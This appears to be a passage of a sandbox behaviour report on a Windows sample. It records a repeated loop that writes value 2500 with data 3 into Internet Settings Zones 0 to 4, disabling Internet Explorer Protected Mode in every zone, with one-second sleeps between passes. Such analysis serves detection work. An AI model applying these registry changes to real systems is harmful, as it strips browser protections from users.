| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
